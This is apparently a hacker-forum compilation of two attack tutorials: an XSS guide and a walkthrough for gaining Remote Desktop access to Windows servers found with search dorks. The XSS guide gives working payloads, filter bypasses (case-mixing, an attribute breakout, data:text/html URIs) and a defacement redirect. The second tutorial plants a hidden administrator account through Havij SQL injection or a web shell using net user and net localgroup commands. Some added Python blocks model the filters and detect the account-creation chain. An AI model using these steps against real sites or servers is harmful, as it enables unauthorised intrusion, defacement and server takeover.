XSS Master Guide FOR ALL XPERTS and NOOBS

This is a detailed guide to everything XSS.

What is XSS?
XSS stands for Cross Site Scripting. It is sometimes called CSS, but that is easily confused with Cascading Style Sheets, so XSS is the preferred term.
Cross Site Scripting is a way of taking advantage of web applications that accept user input but don't filter or encode it properly. This lets an attacker inject HTML or other code, such as JavaScript, into the pages the application serves, so that it runs in other users' browsers.

Different kinds of XSS
There are 3 traditional types of XSS attacks, but if you are inventive and understand everything that goes on between XSS and the server, the possibilities are nearly limitless.

1. DOM-Based Attack
A DOM-based attack is a more advanced attack in which the attacker's payload (a malicious script) is executed because the page's own client-side script modifies the DOM environment in the victim's browser using the injected data, causing the client-side code to run in an unexpected way.

2. Persistent XSS Attack
A persistent XSS attack is one where the attacker's payload is stored permanently by the server and served to every user who views the page, until a server admin removes it.

3. Non-Persistent XSS Attack
A non-persistent XSS attack is one where the attacker's payload is not stored, meaning it doesn't affect the server's stored content. An example of this would be a link that has a non-persistent attack embedded in it.

How do we find a vulnerable server?
There are two main ways to find a server on which to do an XSS attack. You can use a Google search dork, in which you google for common vulnerable patterns in web applications. The other method is to read the actual .php code of the website (I will get into this later).

Here are some good examples of google dorks for an XSS attack.


To use a dork, simply google it and it will spit out a list of results that may be XSS vulnerable if proper filtering wasn't put in place.

Testing for XSS vulnerabilities
To test whether the site you have found is vulnerable, we need to attempt to inject some code through one of its inputs.

You can inject code in multiple ways. If there is a search bar you can inject the code right there. You can inject the code into the URL, for example "http://www.slave.net/newthread.php?fid=CODE GOES HERE". Or, if you are attacking a forum, you can try to inject the code into the body of a thread; this will execute the script when someone opens the thread.

Here is the base test that I use to test for vulnerabilities. Insert it into the website you are attacking.
Code:
<script>alert("test")</script>
If the webpage is vulnerable you should get a sort of pop-up that says "test". If you didn't get anything, don't worry; that usually just means the server admin has put filters in place to counter XSS attacks. I will get into bypassing these filters near the end.

Assuming you have found an XSS-vulnerable site, you can now attack it.
For example, if you inject the following string, everyone who views the page will get an alert saying "Hi! Abh ROCKS!"

Code:
<script>alert("Hi! Abh ROCKS!")</script>
You can also use a redirect script to send the viewer to your deface page, making the site appear defaced.
Code:
<script>window.location = "http://users11.jabry.com/"</script>
One of the main reasons for an XSS attack is to steal cookies. However, I will not get into that in this tutorial because it involves setting up your own server on which to host your cookie stealer PHP script so you can inject it into the victim's server. If you would like me to do a tutorial on that, feel free to leave a comment and I may get around to it.

Finding vulnerabilities by examining PHP code
Because I have never seen a tutorial on this kind of XSS attacking, I figured I would share it as well. We can read the PHP code to find other unfiltered variables to exploit, or to work out what kind of filtering is applied to a specific variable so we can bypass it.

If we look at the Hackforums newthread.php URL, for example, it shows "newthread.php?fid=". The word that comes after the "?" and before the "=" is the variable being modified. And just because that is the only variable it shows doesn't mean it's the only variable we can alter.

I will be talking about diagnosing and bypassing 3 main types of filtering; after that you will have to take what you have learned and apply it to other filter systems.
-str_replace() filter
-htmlentities() filter
-Bypassing filters using data URIs

Let's imagine we have an imaginary page http://localhost/page.php?name=John . The PHP code for this page looks like this.

PHP Code:
<?php
// The "name" parameter is echoed straight into the page with no filtering at all
echo 'Your name is ' . $_GET['name'];
?>
In this page there is no filtering at all, and we can easily attack the "name" variable.
This would be our resulting attack:
http://localhost/page.php?name=<script>alert('XSS')</script>

Bypassing a basic str_replace() filter
Now imagine we are at the same page but the code has changed and now has a basic str_replace() filter on the name variable. The PHP code for this page is as follows.

PHP Code:
<?php
// Strips every literal "script" from the value; str_replace() is case-sensitive
echo 'Your name is ' . str_replace('script', '', $_GET['name']);
?>
What this filter does is replace every instance of "script" in "name" with null (an empty string). Because str_replace() is case-sensitive, we can bypass it simply by mixing some capital letters into the word script in our attack.
Resulting attack:
http://localhost/page.php?name=<ScrIpt>alert('XSS')</ScriPt>

and voila, we have successfully bypassed the filter and injected our code.

Bypassing an htmlentities() filter
A lot of websites use the htmlentities() function against XSS, but with its default flags it only takes care of double quotes, not single quotes.
What htmlentities() does is convert the special characters in a string into HTML entities. This turns every "<" into "&lt;" and ">" into "&gt;", so the resulting text won't be handled as markup. However, we can easily bypass it by writing our script without using <, > or ".
The PHP code for this is:

PHP Code:
<?php
// Default flags (ENT_COMPAT): encodes & < > and double quotes, but not single quotes,
// and the attribute below is delimited by single quotes
echo "<img alt='' src='" . htmlentities($_GET['img']) . "' />";
?>
To inject our code and bypass this filter we simply avoid '<', '>' and ", and make use of HTML event attributes instead.
The resulting attack is:
http://localhost/page.php?img= .' onerror='alert("XSS")
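The str_replace() and htmlentities() bypasses above come down to two properties of the filter: whether it is case-sensitive and which quote characters it encodes. The Python below is an added example (not from the original post) that models those PHP filters and runs the post's own payloads through them, including the ENT_QUOTES setting that closes the single-quote hole; the model functions are my approximations of PHP's behaviour.

```python
import html

# Payloads copied from the tutorial above; constructed test input for the filters.
PAYLOADS = {
    "plain_script": "<script>alert('XSS')</script>",
    "mixed_case": "<ScrIpt>alert('XSS')</ScriPt>",
    "attr_breakout": ".' onerror='alert(\"XSS\")",
}

def str_replace_filter(name):
    """Models str_replace('script', '', $name): a case-sensitive, single-pass
    blacklist, so any other capitalisation of 'script' survives untouched."""
    return "Your name is " + name.replace("script", "")

def htmlentities_compat(value):
    """Models htmlentities($v) with ENT_COMPAT: & < > and double quotes are
    encoded, but single quotes pass through unchanged."""
    return html.escape(value, quote=False).replace('"', "&quot;")

def htmlentities_quotes(value):
    """Models htmlentities($v, ENT_QUOTES): single quotes become &#x27; too."""
    return html.escape(value, quote=True)

def render_img(encoder, img):
    """The tutorial's <img> template with the chosen encoder applied to src."""
    return "<img alt='' src='" + encoder(img) + "' />"

def script_tag_survives(rendered):
    """Name page check: did a <script> tag reach the output in any letter case?"""
    return "<script" in rendered.lower()

def src_attribute_broken(rendered):
    """Image page check: a safe render has exactly four single quotes (two from
    alt='' and two around src); any extra quote means user data closed it."""
    return rendered.count("'") != 4

def filter_report():
    """Run the payloads through each filter; True means the filter was bypassed."""
    attr = PAYLOADS["attr_breakout"]
    return {
        "str_replace/plain": script_tag_survives(str_replace_filter(PAYLOADS["plain_script"])),
        "str_replace/mixed_case": script_tag_survives(str_replace_filter(PAYLOADS["mixed_case"])),
        "ENT_COMPAT/attr_breakout": src_attribute_broken(render_img(htmlentities_compat, attr)),
        "ENT_QUOTES/attr_breakout": src_attribute_broken(render_img(htmlentities_quotes, attr)),
    }

if __name__ == "__main__":
    for case, bypassed in filter_report().items():
        print(f"{case:26s} {'BYPASSED' if bypassed else 'blocked'}")
```

Since PHP 8.1 htmlentities() and htmlspecialchars() default to ENT_QUOTES, so the single-quote trick only applies to older PHP or to code that passes ENT_COMPAT explicitly.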

Bypassing XSS filters using data URIs
This is not a very well-known trick, but you can bypass almost any filter with it. Data URIs are generally used for images, to keep them as text inside an HTML document. I noticed that sometimes you can use one to bypass the htmlspecialchars() XSS filter. The vulnerable page is designed to show a data URI image from the following URL.
http://localhost/page.php?img=data:i...EAAAICRAEAOw==
The PHP code is:

PHP Code:
<?php
// htmlspecialchars() only encodes & < > and quotes; a data: URI needs none of them
echo '<object data="' . htmlspecialchars($_GET['img']) . '" />';
?>
By changing the media type from image/gif to text/html and replacing the data content, it's possible to exploit XSS, because the encoder never sees a character it needs to escape.

Result attack:
http://localhost/page.php?img=data:t...k8L3NjcmlwdD4=
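Because the malicious data: URI contains nothing htmlspecialchars() would encode, the fix for this page is validation, not more encoding. The Python below is an added example (not from the original post) that parses the data: URI and only lets well-formed base64 image types through to the <object> tag; the allow-list, the placeholder and the sample URIs are constructed for the demo.

```python
import base64
import binascii
import html

ALLOWED_IMAGE_TYPES = {"image/gif", "image/png", "image/jpeg"}
PLACEHOLDER = '<object data="about:blank" />'

def parse_data_uri(uri):
    """Split a data: URI into (media_type, is_base64, payload); None if malformed."""
    if not uri.lower().startswith("data:"):
        return None
    header, sep, payload = uri[5:].partition(",")
    if not sep:
        return None
    params = header.split(";")
    media_type = params[0].strip().lower() or "text/plain"
    is_base64 = any(p.strip().lower() == "base64" for p in params[1:])
    return media_type, is_base64, payload

def safe_object_data(img):
    """Allow-list version of the tutorial's page: only a well-formed base64
    image data: URI is embedded; anything else renders the placeholder."""
    parsed = parse_data_uri(img)
    if parsed is None:
        return PLACEHOLDER
    media_type, is_base64, payload = parsed
    if media_type not in ALLOWED_IMAGE_TYPES or not is_base64:
        return PLACEHOLDER
    try:
        base64.b64decode(payload, validate=True)   # reject junk that is not base64
    except (binascii.Error, ValueError):
        return PLACEHOLDER
    return '<object data="' + html.escape(img, quote=True) + '" />'

# Constructed samples: a bare GIF header and a harmless HTML document, both base64.
GIF_URI = "data:image/gif;base64," + base64.b64encode(b"GIF89a").decode()
HTML_URI = "data:text/html;base64," + base64.b64encode(b"<p>constructed</p>").decode()

def escaping_is_noop(uri):
    """Shows why htmlspecialchars() cannot help here: the URI comes back unchanged."""
    return html.escape(uri, quote=True) == uri

if __name__ == "__main__":
    print(safe_object_data(GIF_URI))
    print(safe_object_data(HTML_URI))
```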


I hope you enjoyed the tutorial; if anyone has any questions feel free to ask. I apologize if I got any information incorrect, I'm still new at this.

Please comment and keep alive :)

Tutorial Get RDP With Havij and With Shell Hosted Windows

Hi guys. I created this simple tutorial, hahaha..
OK, we don't only control the web server with a shell such as b374k or lotus or whatever the shell is called; we can also use the built-in Windows feature Remote Desktop. The catch is that we still need a username and password for access to the server, and the username and password we obtain through SQL injection will not necessarily be the same ones used to log in to the computer. So what do we do then? We can use Havij for that. The materials are:

Dork. I use the dork inurl:/*.asp?id=
Havij
internet connection
patience to look for victims



OK, I assume everyone has got a victim and has already scanned it with Havij. Then we select the CMD icon in Havij, and in that column we enter "net user (your chosen login name) (password) /add" and click "execute".


Once that's done we enter "net localgroup administrators (your chosen login name) /add" and again click "execute".

Next, we open the Windows facility for this, which is Remote Desktop (Start - All Programs - Accessories - Remote Desktop Connection). Then we enter our target's IP, click connect, and wait a moment until a connection is made..

Then enter the username and password that we created earlier..

and tadaaa.. we are into the victim server

Here is the same thing using a command shell hosted on Windows

1. Make sure you have administrator access on the web server. How:
code:
net user
If you have administrator access it will show something like this:
code:
User accounts for \\
-------------------------------------------------------------------------------
administrator
Support_388945a0 tom1983
The command completed with one or more errors.
Adding a user; here I use the user name bery:
code:
net user bery /add
Giving the user bery Administrator access:
code:
net localgroup administrators bery /add
We set a password:
code:
net user bery 1234

Okay, then open the Remote Desktop Connection that comes with your Windows. Because I'm using Windows XP, it is located in
code:
Start - All Programs - Accessories - Remote Desktop Connection
all done
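The chain described above (a new local user, added to Administrators, then an RDP logon) is noisy in the Windows Security log. The Python below is an added example, not part of the original post, that correlates those three event IDs over a constructed sample; the field names and the one-hour window are simplifying assumptions.

```python
from datetime import datetime, timedelta

# Constructed Windows Security log sample (not real logs). The steps above leave
# 4720 (account created), 4732 (member added to a local group) and 4624 with
# LogonType 10 (RemoteInteractive, i.e. RDP) behind. Real 4732 events carry the
# member as a SID; it is shown pre-resolved here for brevity.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:00", "id": 4720, "target": "bery"},
    {"time": "2024-01-01T10:00:05", "id": 4732, "target": "bery", "group": "Administrators"},
    {"time": "2024-01-01T10:03:00", "id": 4624, "target": "bery", "logon_type": 10},
    {"time": "2024-01-01T11:00:00", "id": 4720, "target": "svc_backup"},
    {"time": "2024-01-01T11:30:00", "id": 4624, "target": "svc_backup", "logon_type": 3},
]

def detect_created_promoted_rdp(events, window=timedelta(hours=1)):
    """Return (user, created_at) for every account that was created, added to
    Administrators and then used for an RDP logon, all within `window`."""
    created, promoted, hits = {}, set(), []
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        user = e["target"].lower()
        if e["id"] == 4720:
            created[user] = t                      # step 1: net user X /add
        elif e["id"] == 4732 and e.get("group", "").lower() == "administrators":
            if user in created and t - created[user] <= window:
                promoted.add(user)                 # step 2: net localgroup administrators X /add
        elif e["id"] == 4624 and e.get("logon_type") == 10:
            if user in promoted and t - created[user] <= window:
                hits.append((user, created[user].isoformat()))
                promoted.discard(user)             # report each chain once
    return hits

if __name__ == "__main__":
    for user, when in detect_created_promoted_rdp(SAMPLE_EVENTS):
        print(f"ALERT: {user} created at {when}, promoted to admin and used over RDP")
```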
